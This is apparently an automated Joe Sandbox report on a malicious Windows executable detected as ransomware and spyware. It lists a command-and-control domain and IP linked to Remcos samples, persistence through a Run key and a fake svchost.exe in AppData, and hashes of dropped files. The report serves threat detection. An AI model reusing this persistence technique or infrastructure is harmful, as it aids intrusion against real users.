                  windowsserverfebarch.duckdns.orgEstonia
                  42831UKSERVERS-ASUKDedicatedServersHostingandCo-Locationtrue
                  IP
                  127.0.0.1
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1482506
                  Start date and time:2024-07-25 23:54:40 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 12m 5s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:53
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:LisectAVT_2403002A_136.exe
                  Detection:MAL
                  Classification:mal100.rans.troj.spyw.expl.evad.winEXE@79/63@5/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 93%
                  • Number of executed functions: 69
                  • Number of non-executed functions: 297
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                  • Excluded IPs from analysis (whitelisted): 184.28.90.27, 40.126.32.134, 40.126.32.68, 40.126.32.133, 20.190.160.14, 40.126.32.140, 20.190.160.17, 40.126.32.72, 40.126.32.76, 20.189.173.21, 52.168.117.173
                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • VT rate limit hit for: LisectAVT_2403002A_136.exe
                  TimeTypeDescription
                  17:55:30API Interceptor4x Sleep call for process: svchost.exe modified
                  17:55:38API Interceptor85x Sleep call for process: powershell.exe modified
                  17:55:44API Interceptor6x Sleep call for process: WerFault.exe modified
                  17:56:12API Interceptor4717308x Sleep call for process: csc.exe modified
                  22:55:33Task SchedulerRun new task: svchost path: "C:\Users\user\AppData\Roaming\svchost.exe"
                  22:55:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
                  22:55:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  45.128.223.185LisectAVT_2403002A_88.exeGet hashmaliciousRemcosBrowse
                    LisectAVT_2403002C_7.exeGet hashmaliciousRemcosBrowse
                      DHL AWB 9284730932.exeGet hashmaliciousRemcosBrowse
                        DHL AWB 92847309320.exeGet hashmaliciousRemcosBrowse
                          DHL AWB 9284730932.exeGet hashmaliciousRemcosBrowse
                            REF # 419.exeGet hashmaliciousRemcosBrowse
                              SecuriteInfo.com.Win32.PWSX-gen.1685.16786.exeGet hashmaliciousRemcosBrowse
                                REF#22790.exeGet hashmaliciousRemcosBrowse
                                  SecuriteInfo.com.Win32.PWSX-gen.30390.16066.exeGet hashmaliciousRemcosBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    windowsserverfebarch.duckdns.orgLisectAVT_2403002A_88.exeGet hashmaliciousRemcosBrowse
                                    • 45.128.223.185
                                    LisectAVT_2403002C_7.exeGet hashmaliciousRemcosBrowse
                                    • 45.128.223.185
                                    DHL AWB 9284730932.exeGet hashmaliciousRemcosBrowse
                                    • 45.128.223.185
                                    DHL AWB 92847309320.exeGet hashmaliciousRemcosBrowse
                                    • 45.128.223.185
                                    DHL AWB 9284730932.exeGet hashmaliciousRemcosBrowse
                                    • 45.128.223.185
                                    REF # 419.exeGet hashmaliciousRemcosBrowse
                                    • 45.128.223.185
                                    SecuriteInfo.com.Win32.PWSX-gen.1685.16786.exeGet hashmaliciousRemcosBrowse
                                    • 45.128.223.185
                                    REF#22790.exeGet hashmaliciousRemcosBrowse
                                    • 45.128.223.185
                                    SecuriteInfo.com.Win32.PWSX-gen.30390.16066.exeGet hashmaliciousRemcosBrowse
                                    • 45.128.223.185
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    UKSERVERS-ASUKDedicatedServersHostingandCo-LocationLisectAVT_2403002A_88.exeGet hashmaliciousRemcosBrowse
                                    • 45.128.223.185
                                    LisectAVT_2403002C_7.exeGet hashmaliciousRemcosBrowse
                                    • 45.128.223.185
                                    RFQ_SOF_2024_43345.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    • 78.110.166.82
                                    s4WsI8Qcm4.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 78.157.201.108
                                    IMG_160750_311608.exeGet hashmaliciousAgentTesla, Clipboard Hijacker, PureLog StealerBrowse
                                    • 78.110.166.82
                                    oTfjRHJdWzffhcnPGd.exeGet hashmaliciousAgentTeslaBrowse
                                    • 78.110.166.82
                                    SZwdzMMRBU.elfGet hashmaliciousUnknownBrowse
                                    • 78.157.201.103
                                    FATURA.exeGet hashmaliciousAgentTeslaBrowse
                                    • 78.110.166.82
                                    GfU2VYzM9r.elfGet hashmaliciousMiraiBrowse
                                    • 94.46.221.213
                                    Request_For_Quote_060624.exeGet hashmaliciousAgentTeslaBrowse
                                    • 78.110.166.82
                                    No context
                                    No context
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8192
                                    Entropy (8bit):0.35999246155449205
                                    Encrypted:false
                                    SSDEEP:6:6xvoaaD0JOCEfMuaaD0JOCEfMKQmDQxvoaaD0JOCEfMuaaD0JOCEfMKQmD:VaaD0JcaaD0JwQQXaaD0JcaaD0JwQQ
                                    MD5:05D40140A9F48E41E7916377A71CB444
                                    SHA1:927426B8D39B22BA41FCC150E2BF6CA10A3BCFB3
                                    SHA-256:2D2A456A1CE20B3F1DA1E76CD5A9CFF68D95A1CA55F5362969D7BF28B25A5693
                                    SHA-512:E71ABFA058B3489DE1DCAB48114261BC7E4AEC9CBCFDAF2F90326D6F19DBC5F3BA57A104E185BB3BD450DF5F9A2FF001BFF20E95461925F2EFE3C8B1B4D68A18
                                    Malicious:false
                                    Preview:*.>...........J.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................J.............................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.4984926755987158
                                    Encrypted:false
                                    SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1Ztac:cJhXC9lHmutpJyiRDeJ/aUKrDgnmO
                                    MD5:F85487554C905AF6B27E2E34B8E2A7A3
                                    SHA1:AF50314F1A852C2EA3EB79D49DC5921412F7C77C
                                    SHA-256:001C04563F48D085BFBBF98617AC8D4C9672D0A1B9388BA5053BC6DBDFEE5F93
                                    SHA-512:94295E09754E0FE46460C5DA765DB09AD3322A92D065AF27637F1A0D689530516D63A12276F5B64E1A22766E316787FB93E387371D4ADBA2D61722644DDE2634
                                    Malicious:false
                                    Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc28981b4, page size 16384, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.5834461008084681
                                    Encrypted:false
                                    SSDEEP:1536:PSB2ESB2SSjlK/e5m0hnRJjAVtutYkr3g1652UPkLk+ksLZiAcZWzAkUk1kG/w4n:PazagFaC2UizN/w4wdi
                                    MD5:A8E29BCB5C22AB0E934218DA6DAF7D1E
                                    SHA1:33BE0ED5A63E0039156C2D64AEDAB5E37768AF56
                                    SHA-256:BD9F1C74BEC956461B64E61E16787928F3416FD5B75C00BD72BE52A88DB8F8AF
                                    SHA-512:55A0154B5D2EB74B3BB474F2217BCCD514296DB8DE0EF264B72739C96712E85684E323CFB2EDA78953266082FDADDEFC0146D879E152466BF6812DAB6265E746
                                    Malicious:false
                                    Preview:...... ...............X\...;...{......................0.I.....*:...|3..7...|W.h.F.....*:...|3.0.I.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................X..*:...|3.....................*:...|3..........................#......0.I.....................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16384
                                    Entropy (8bit):0.0807227993688407
                                    Encrypted:false
                                    SSDEEP:3:/UetYeMD150XB9YYpQknw1uXkPwuXAllTH//lll/TP1/l:lz80XrYYpQNYXkNXARf/ljFl
                                    MD5:942C87E5E53DA8F1B35B432B1EA8D522
                                    SHA1:0A723074A5BCF4E2E47225FDBE5CF4C23E41E4FD
                                    SHA-256:19903133E8EF98A32E9DA6BC9FEC89EDD746EDD487699846A8DF80603CD76BC4
                                    SHA-512:BF297EC9E9F4CAC2721BF7BF9E7D98B1A1135ED8E5F3238FC5A700B804A89F6FA5098F227F026597EC2D2F39114BDC110A483A403AEAE118F8B78436462EC4A1
                                    Malicious:false
                                    Preview:.........................................;...{...7...|W.*:...|3.........*:...|..*:...|3..5.#*:...|3.....................*:...|3.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.2650017161759444
                                    Encrypted:false
                                    SSDEEP:192:Kivu94ii0l4Cw+L2ay5eFlJsfZF9usNbgnuzuiFEZ24lO8Zw:XvS40lHwFaKUt4guzuiFEY4lO8O
                                    MD5:BDFA7955A0709BFB1CB7BE77F59EDE70
                                    SHA1:E1C7C9C10773315D1DB670E523A42CA20D474B4E
                                    SHA-256:ADD0C5AB7DD0B10CBE909CCD1CCE200FC828EE259CFFCE0FC1F5DF74C4F5AB63
                                    SHA-512:464E669894B5A95E475BF7818CE2806F9229ED9C0BB502C19952BA6BFBEC3ADD1AD06B4A8F7FACBA29B8D411A39038CC10BF7B97338AF8B25CC4BEAF272E4166
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.1.8.1.3.7.7.1.7.8.4.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.1.8.1.3.9.2.1.7.8.4.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.d.a.5.8.5.a.-.0.f.2.8.-.4.2.7.0.-.9.0.5.4.-.3.a.0.e.e.6.5.2.4.b.f.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.d.b.7.f.d.3.-.1.1.d.e.-.4.b.9.e.-.b.5.9.9.-.b.a.b.5.3.f.e.a.7.d.1.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.y.o.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.7.0.-.0.0.0.1.-.0.0.1.4.-.2.3.3.7.-.b.6.6.0.d.d.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.f.7.3.c.7.a.9.4.5.4.0.8.5.e.e.6.7.1.3.0.7.d.6.0.e.6.6.3.2.3.2.0.0.0.0.0.0.0.0.!.0.0.0.0.9.3.f.a.2.a.f.c.e.7.e.e.9.c.5.8.c.0.4.6.c.7.3.0.7.a.0.c.3.0.f.f.c.6.c.f.7.8.3.4.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.e.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.2712421467754436
                                    Encrypted:false
                                    SSDEEP:192:OeCcG9tii0l4Cw+L2a+TjsPl/glZFEksOli/zuiFEZ24lO8Zw:Jbat0lHwFaaj0PsszuiFEY4lO8O
                                    MD5:D9405F0ED7A064A5BC7780C0C611B2C0
                                    SHA1:7AC66C9371B205571CB683AFE68A68B8C06DDD2D
                                    SHA-256:D629EBC3B03D49FCDD3386AB9832A9AD042D5166F7B5DD90976961ABB0D87EF4
                                    SHA-512:74EEFBF917B0FB2182802630D0BAF78EEFD5978C8FEBEC1D7AEAC0284D1741735BA1241E1412F24237CD1EDED2557616CF7D1D435AC6515A5FA62B9054D2BDA0
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.1.8.1.3.7.9.9.7.2.6.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.1.8.1.4.1.3.4.1.0.1.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.3.a.d.5.3.8.7.-.4.c.f.8.-.4.0.8.5.-.a.3.4.4.-.d.b.1.9.b.4.4.2.9.9.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.6.1.2.7.c.f.0.-.4.1.d.a.-.4.6.6.c.-.9.a.2.a.-.9.7.b.5.2.0.2.7.a.3.5.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.y.o.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.1.c.-.0.0.0.1.-.0.0.1.4.-.8.d.d.b.-.7.4.5.f.d.d.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.f.7.3.c.7.a.9.4.5.4.0.8.5.e.e.6.7.1.3.0.7.d.6.0.e.6.6.3.2.3.2.0.0.0.0.0.0.0.0.!.0.0.0.0.9.3.f.a.2.a.f.c.e.7.e.e.9.c.5.8.c.0.4.6.c.7.3.0.7.a.0.c.3.0.f.f.c.6.c.f.7.8.3.4.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.e.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.2558464526209812
                                    Encrypted:false
                                    SSDEEP:192:HHNu94uw0F41u0L2ay5eFlJsfZF9usNbgnuzuiFEZ24lO81w:NS4uLF41uHaKUt4guzuiFEY4lO8i
                                    MD5:8847C62814C5D188404E55DE9A7A13FC
                                    SHA1:833E0FA13A93EC088992CECDC590E776F1D82673
                                    SHA-256:7F46EC6FBE690E2688DB2CF7C5A6E53628945C007665DFB0460AB0A0067954BD
                                    SHA-512:D508660FF78A2F321AD83A9494232E9F8DA4D84853600EBBF2FA7C6CECEFDBD1EA1A2EA448EC568A957C3199E0BC2E24BA3AF7ED8C092545B74A47B6709FE8F9
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.1.8.1.4.5.2.1.8.7.1.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.1.8.1.4.5.8.5.9.3.4.5.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.9.b.6.7.0.c.-.f.d.5.5.-.4.6.6.2.-.a.c.9.1.-.1.b.d.1.3.7.f.5.a.5.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.e.c.9.9.f.3.b.-.e.f.2.2.-.4.e.6.4.-.8.a.f.2.-.9.8.8.c.8.f.6.4.4.5.0.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.y.o.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.7.0.-.0.0.0.1.-.0.0.1.4.-.2.3.3.7.-.b.6.6.0.d.d.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.f.7.3.c.7.a.9.4.5.4.0.8.5.e.e.6.7.1.3.0.7.d.6.0.e.6.6.3.2.3.2.0.0.0.0.0.0.0.0.!.0.0.0.0.9.3.f.a.2.a.f.c.e.7.e.e.9.c.5.8.c.0.4.6.c.7.3.0.7.a.0.c.3.0.f.f.c.6.c.f.7.8.3.4.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.261752002010149
                                    Encrypted:false
                                    SSDEEP:192:H6+G9tuw0F41u0L2a+TjsPl/glZFEksOli/zuiFEZ24lO81w:1atuLF41uHaaj0PsszuiFEY4lO8i
                                    MD5:45591135309FDEFEDA6CF306BF44B275
                                    SHA1:150A3CCF30C74F1066A53D972082D03BBC1F3132
                                    SHA-256:AED2FDF28AC6E0B629688682CF1B7A72B19111EBC80A32F6E635DAA3E3236A0F
                                    SHA-512:079A465A7325AA7CC295C09461D46B79183ED50F734CAC4CA7BDFBB1562AA6A6C769B0A1CC98433845ABE9779AD21D1C3AA38F69104C5511FF78F4C4BFE6DB13
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.1.8.1.4.9.9.2.8.4.7.5.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.1.8.1.5.1.7.7.2.2.2.5.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.6.a.2.b.1.d.-.a.c.8.c.-.4.c.6.f.-.b.e.3.f.-.2.9.e.0.b.5.7.5.e.d.6.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.7.3.b.a.4.2.-.b.e.c.4.-.4.7.b.9.-.8.e.d.e.-.e.b.d.d.6.e.0.6.b.d.c.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.y.o.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.1.c.-.0.0.0.1.-.0.0.1.4.-.8.d.d.b.-.7.4.5.f.d.d.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.f.7.3.c.7.a.9.4.5.4.0.8.5.e.e.6.7.1.3.0.7.d.6.0.e.6.6.3.2.3.2.0.0.0.0.0.0.0.0.!.0.0.0.0.9.3.f.a.2.a.f.c.e.7.e.e.9.c.5.8.c.0.4.6.c.7.3.0.7.a.0.c.3.0.f.f.c.6.c.f.7.8.3.4.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.2484212266507067
                                    Encrypted:false
                                    SSDEEP:192:4nRe96t+0uvdupL2aK5eFlJsfZF9usNbgndzuiFEZ24lO81w:QUgluvdlaCUt4gdzuiFEY4lO8i
                                    MD5:37E9291BB818B7FB66C18498CE3617A6
                                    SHA1:AC2ACF7C4294118FA16CAB85D5F8A6843BFFF846
                                    SHA-256:F00C84DC0106A361CB2AFEB04825C1DC2C1661B23DA64EF371F72F31513C1266
                                    SHA-512:775EAD80893E39313DA0FBE4EBBCCCF1C75C98B12D07F4091DF3D017FE860245B34CB996DF0DD3A4FDCDC063DCE5F16B9799ED40FD227D4257063F7E00F4C9B2
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.1.8.1.4.7.1.0.0.6.0.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.1.8.1.4.8.0.3.8.1.0.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.5.d.1.9.7.d.9.-.0.6.7.d.-.4.1.5.e.-.8.a.2.f.-.5.a.c.4.8.a.5.a.8.5.7.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.1.b.6.6.0.9.-.3.d.4.6.-.4.2.f.e.-.a.1.e.2.-.a.e.6.2.9.d.5.8.e.2.d.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.y.o.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.3.0.-.0.0.0.1.-.0.0.1.4.-.5.9.a.7.-.f.a.6.5.d.d.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.f.7.3.c.7.a.9.4.5.4.0.8.5.e.e.6.7.1.3.0.7.d.6.0.e.6.6.3.2.3.2.0.0.0.0.0.0.0.0.!.0.0.0.0.9.3.f.a.2.a.f.c.e.7.e.e.9.c.5.8.c.0.4.6.c.7.3.0.7.a.0.c.3.0.f.f.c.6.c.f.7.8.3.4.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.2541709885080397
                                    Encrypted:false
                                    SSDEEP:192:nSR9Uj0Tx/iL2ay5eFlJsfZF9usNbgnVzuiFEZ24lO81w:SbUQTx/RaKUt4gVzuiFEY4lO8i
                                    MD5:BF3AD49AF206075995217B5BBC709C55
                                    SHA1:A16DD73B9D732F108F643CD6B792FCA173BC20CC
                                    SHA-256:D2E08342E5FB07CA1C8F4C9B5797B3806DD4C0D1C56C22957EAA4D22266A0BD8
                                    SHA-512:A58AFB5950621EA7AD7450C86166836D11F85B7C774B2EF4274C4205C250D32A85B527E462D551AB0AF287D4BFE438E52C163E371C14140237FEF1B0331A793D
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.1.8.1.5.5.3.9.6.6.2.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.1.8.1.5.6.4.2.7.8.6.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.e.0.3.b.6.4.-.0.9.4.2.-.4.a.e.b.-.9.a.d.e.-.d.b.a.c.d.2.d.8.d.b.6.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.7.9.4.2.5.4.3.-.1.4.1.a.-.4.2.b.9.-.a.e.4.a.-.e.4.f.8.6.a.2.2.4.a.a.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.y.o.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.f.0.-.0.0.0.1.-.0.0.1.4.-.1.e.4.0.-.d.7.6.a.d.d.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.f.7.3.c.7.a.9.4.5.4.0.8.5.e.e.6.7.1.3.0.7.d.6.0.e.6.6.3.2.3.2.0.0.0.0.0.0.0.0.!.0.0.0.0.9.3.f.a.2.a.f.c.e.7.e.e.9.c.5.8.c.0.4.6.c.7.3.0.7.a.0.c.3.0.f.f.c.6.c.f.7.8.3.4.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.g.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8840
                                    Entropy (8bit):3.7114006302805995
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJMKVCgR6YcD2LikGgmfOL0gyprt89b2RNf7ym:R6lXJMQVR6YBLYgmfOLLN27fP
                                    MD5:C1180D3B1B5F6B69C8538FB5903D87C7
                                    SHA1:9E51BE8AE5117856FBD2D9ADA4ADC3942B678A23
                                    SHA-256:714B7AA11FEC8462D372AE7CD601CEC3AF038BCD334061516E3B069464A48DCA
                                    SHA-512:3B21142033083E50534B723F9E5F7B48256A6B29FA3C54F11A4D39C91E9C608268D51098C0835B9D78E2BA0E9CD1A3A8BCFD7A1A71AC6AFB2F51C154E3122DDA
                                    Malicious:false
